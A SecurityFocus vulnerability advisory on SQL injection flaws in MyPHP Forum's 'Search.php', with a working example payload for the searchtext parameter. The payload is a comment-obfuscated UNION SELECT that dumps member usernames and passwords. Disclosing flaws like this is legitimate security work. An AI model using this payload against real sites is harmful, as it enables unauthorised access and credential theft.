Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

MyPHP Forum 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example SQL query is available:

submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*"







 

Privacy Statement
Copyright 2009, SecurityFocus